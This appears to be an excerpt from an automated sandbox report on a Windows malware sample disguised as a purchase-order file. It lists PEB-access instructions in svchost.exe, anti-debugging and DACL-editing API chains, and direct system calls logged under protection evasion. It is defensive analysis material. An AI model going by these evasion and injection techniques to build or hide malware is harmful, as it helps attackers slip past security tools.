            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6E59C mov eax, dword ptr fs:[00000030h]1_2_02F6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32582 mov eax, dword ptr fs:[00000030h]1_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F32582 mov ecx, dword ptr fs:[00000030h]1_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64588 mov eax, dword ptr fs:[00000030h]1_2_02F64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6656A mov eax, dword ptr fs:[00000030h]1_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h]1_2_02F38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38550 mov eax, dword ptr fs:[00000030h]1_2_02F38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40535 mov eax, dword ptr fs:[00000030h]1_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5E53E mov eax, dword ptr fs:[00000030h]1_2_02F5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC6500 mov eax, dword ptr fs:[00000030h]1_2_02FC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03004B00 mov eax, dword ptr fs:[00000030h]1_2_03004B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]1_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6AAEE mov eax, dword ptr fs:[00000030h]1_2_02F6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F30AD0 mov eax, dword ptr fs:[00000030h]1_2_02F30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]1_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F64AD0 mov eax, dword ptr fs:[00000030h]1_2_02F64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86ACC mov eax, dword ptr fs:[00000030h]1_2_02F86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]1_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F38AA0 mov eax, dword ptr fs:[00000030h]1_2_02F38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03002B57 mov eax, dword ptr fs:[00000030h]1_2_03002B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F86AA4 mov eax, dword ptr fs:[00000030h]1_2_02F86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F68A90 mov edx, dword ptr fs:[00000030h]1_2_02F68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F3EA80 mov eax, dword ptr fs:[00000030h]1_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]1_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FACA72 mov eax, dword ptr fs:[00000030h]1_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA6F mov eax, dword ptr fs:[00000030h]1_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FDEA60 mov eax, dword ptr fs:[00000030h]1_2_02FDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F36A50 mov eax, dword ptr fs:[00000030h]1_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]1_2_02F40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F40A5B mov eax, dword ptr fs:[00000030h]1_2_02F40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]1_2_02F54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F54A35 mov eax, dword ptr fs:[00000030h]1_2_02F54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F6CA24 mov eax, dword ptr fs:[00000030h]1_2_02F6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F5EA2E mov eax, dword ptr fs:[00000030h]1_2_02F5EA2E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FBCA11 mov eax, dword ptr fs:[00000030h] 1_2_02FBCA11
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h] 1_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h] 1_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F38BF0 mov eax, dword ptr fs:[00000030h] 1_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F5EBFC mov eax, dword ptr fs:[00000030h] 1_2_02F5EBFC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FBCBF0 mov eax, dword ptr fs:[00000030h] 1_2_02FBCBF0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FDEBD0 mov eax, dword ptr fs:[00000030h] 1_2_02FDEBD0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h] 1_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h] 1_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F50BCB mov eax, dword ptr fs:[00000030h] 1_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h] 1_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h] 1_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F30BCD mov eax, dword ptr fs:[00000030h] 1_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h] 1_2_02F40BBE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F40BBE mov eax, dword ptr fs:[00000030h] 1_2_02F40BBE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FE4BB0 mov eax, dword ptr fs:[00000030h] 1_2_02FE4BB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FE4BB0 mov eax, dword ptr fs:[00000030h] 1_2_02FE4BB0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03004A80 mov eax, dword ptr fs:[00000030h] 1_2_03004A80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F2CB7E mov eax, dword ptr fs:[00000030h] 1_2_02F2CB7E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F28B50 mov eax, dword ptr fs:[00000030h] 1_2_02F28B50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FDEB50 mov eax, dword ptr fs:[00000030h] 1_2_02FDEB50
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FE4B4B mov eax, dword ptr fs:[00000030h] 1_2_02FE4B4B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FE4B4B mov eax, dword ptr fs:[00000030h] 1_2_02FE4B4B
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h] 1_2_02FC6B40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FC6B40 mov eax, dword ptr fs:[00000030h] 1_2_02FC6B40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FFAB40 mov eax, dword ptr fs:[00000030h] 1_2_02FFAB40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FD8B42 mov eax, dword ptr fs:[00000030h] 1_2_02FD8B42
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h] 1_2_02F5EB20
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F5EB20 mov eax, dword ptr fs:[00000030h] 1_2_02F5EB20
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h] 1_2_02FF8B28
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FF8B28 mov eax, dword ptr fs:[00000030h] 1_2_02FF8B28
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FAEB1D mov eax, dword ptr fs:[00000030h] 1_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h] 1_2_02F6C8F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F6C8F9 mov eax, dword ptr fs:[00000030h] 1_2_02F6C8F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FFA8E4 mov eax, dword ptr fs:[00000030h] 1_2_02FFA8E4
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F5E8C0 mov eax, dword ptr fs:[00000030h] 1_2_02F5E8C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03004940 mov eax, dword ptr fs:[00000030h] 1_2_03004940
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FBC89D mov eax, dword ptr fs:[00000030h] 1_2_02FBC89D
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F30887 mov eax, dword ptr fs:[00000030h] 1_2_02F30887
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h] 1_2_02FBE872
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FBE872 mov eax, dword ptr fs:[00000030h] 1_2_02FBE872
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h] 1_2_02FC6870
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FC6870 mov eax, dword ptr fs:[00000030h] 1_2_02FC6870
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F60854 mov eax, dword ptr fs:[00000030h] 1_2_02F60854
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h] 1_2_02F34859
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F34859 mov eax, dword ptr fs:[00000030h] 1_2_02F34859
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F42840 mov ecx, dword ptr fs:[00000030h] 1_2_02F42840
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h] 1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h] 1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h] 1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F52835 mov ecx, dword ptr fs:[00000030h] 1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h] 1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F52835 mov eax, dword ptr fs:[00000030h] 1_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F6A830 mov eax, dword ptr fs:[00000030h] 1_2_02F6A830
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h] 1_2_02FD483A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FD483A mov eax, dword ptr fs:[00000030h] 1_2_02FD483A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FBC810 mov eax, dword ptr fs:[00000030h] 1_2_02FBC810
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h] 1_2_02F629F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F629F9 mov eax, dword ptr fs:[00000030h] 1_2_02F629F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FBE9E0 mov eax, dword ptr fs:[00000030h] 1_2_02FBE9E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] 1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] 1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] 1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] 1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] 1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F3A9D0 mov eax, dword ptr fs:[00000030h] 1_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F649D0 mov eax, dword ptr fs:[00000030h] 1_2_02F649D0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FFA9D3 mov eax, dword ptr fs:[00000030h] 1_2_02FFA9D3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FC69C0 mov eax, dword ptr fs:[00000030h] 1_2_02FC69C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB89B3 mov esi, dword ptr fs:[00000030h] 1_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h] 1_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FB89B3 mov eax, dword ptr fs:[00000030h] 1_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] 1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] 1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] 1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] 1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] 1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] 1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] 1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] 1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] 1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] 1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] 1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] 1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F429A0 mov eax, dword ptr fs:[00000030h] 1_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h] 1_2_02F309AD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F309AD mov eax, dword ptr fs:[00000030h] 1_2_02F309AD
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h] 1_2_02FD4978
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FD4978 mov eax, dword ptr fs:[00000030h] 1_2_02FD4978
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02FBC97C mov eax, dword ptr fs:[00000030h] 1_2_02FBC97C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h] 1_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_02F56962 mov eax, dword ptr fs:[00000030h] 1_2_02F56962
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F60B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00F60B62
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F32622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00F32622
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F2083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00F2083F
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F209D5 SetUnhandledExceptionFilter, 0_2_00F209D5
            Source: C:\Users\user\Desktop\PO_987654345678.exe Code function: 0_2_00F20C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00F20C21

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtOpenKeyEx: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
